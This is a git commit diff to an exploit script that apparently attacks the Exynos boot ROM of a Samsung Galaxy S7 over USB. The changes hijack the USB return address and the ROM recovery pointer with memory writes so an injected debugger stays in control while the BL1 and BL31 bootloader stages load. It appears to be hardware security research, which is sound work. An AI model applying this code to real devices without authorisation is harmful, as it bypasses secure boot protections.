Debugger alive after bl31

2024-08-16 19:37:25 +02:00 · 2024-08-16 19:37:25 +02:00 · 5e7cfa7a60
commit 5e7cfa7a60
parent 55da2ce981
1 changed files with 22 additions and 8 deletions
--- a/source/exploit/exploit.py
+++ b/source/exploit/exploit.py
@ -83,7 +83,7 @@ class ExynosDevice():
        except Exception as e:
            if e.value == usb1.libusb1.LIBUSB_ERROR_TIMEOUT or e.value == usb1.libusb1.LIBUSB_ERROR_IO:
                print("Device disconnected / not connected. Reconnect USB?")
-                sys.exit(0)
+                sys.exit(1)
            else:
                raise e
            
@ -380,7 +380,7 @@ class ExynosDevice():
                sys.exit(0)

        self.cd.memwrite_region(0x020c0000, debugger_reloc)
-        self.usb_write(b"FLSH") # Flush cache
+        # self.usb_write(b"FLSH") # Flush cache
        self.cd.restore_stack_and_jump(0x020c0000)
        assert self.usb_read(0x200) == b"GiAs", "Failed to relocate debugger"
        self.cd.relocate_debugger(0x020c7000, 0x020c0000, 0x020c4000)
@ -563,12 +563,13 @@ class ExynosDevice():
        logger.debug('State after setting up initial debugger')
        self.cd.arch_dbg.state.print_ctx()

+        # self.relocate_debugger()
        DEBUGGER_ADDR = 0x2069000 #0x020c0000

        ### Overwrite boot_usb_ra to our debugger
        self.cd.test_connection()
        hijacked_usb_ra = self.cd.memdump_region(0x02020f60, 8)
-        self.cd.memwrite_region(0x02020f60, p64(0x2069000))
+        self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))

        ### Set link register and boot into the USB function
        BOOT_USB_FUNCTION = 0x000064e0
@ -600,21 +601,34 @@ class ExynosDevice():
        
        assert self.usb_read(0x200) == b"GiAs", "Failed to jump back to debugger"
        auth_bl1(DEBUGGER_ADDR)
-        time.sleep(1)
-
-        self.cd.memwrite_region(0x02020f60, hijacked_usb_ra)

        self.usb_write(b"FLSH") # Flush cache
+        
+        # hijack rom recovery
+        # self.relocate_debugger()
+        # DEBUGGER_ADDR = 0x020c0000
+        self.cd.memwrite_region(0x020200dc, p32(DEBUGGER_ADDR)) # Rom recovery
+        self.cd.memwrite_region(0x02020f60, p64(DEBUGGER_ADDR))
+
        jump_bl1(DEBUGGER_ADDR)
        time.sleep(2)
        self.connect_device()
-        # self.connect_device()

+        # After booting bl1, back in debugger. 
+        self.usb_read(0x200) # GiAs
+        self.cd.memwrite_region(0x02020f60, hijacked_usb_ra) 
+
+        # Load bl31
+        self.cd.restore_stack_and_jump(0x00006590)
+        # self.usb_read(0x200) # GiAs

        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.2.bin", "rb").read())
-        time.sleep(2)
+        time.sleep(1)
        self.connect_device()

+        ### WORKS UNTIL HERE. Unsure where we are in BL31 currently
+
+        # Load BL3
        self.send_normal_stage(open("../S7/g930f_latest/g930f_sboot.bin.3.bin", "rb").read())
        time.sleep(2)
        self.connect_device()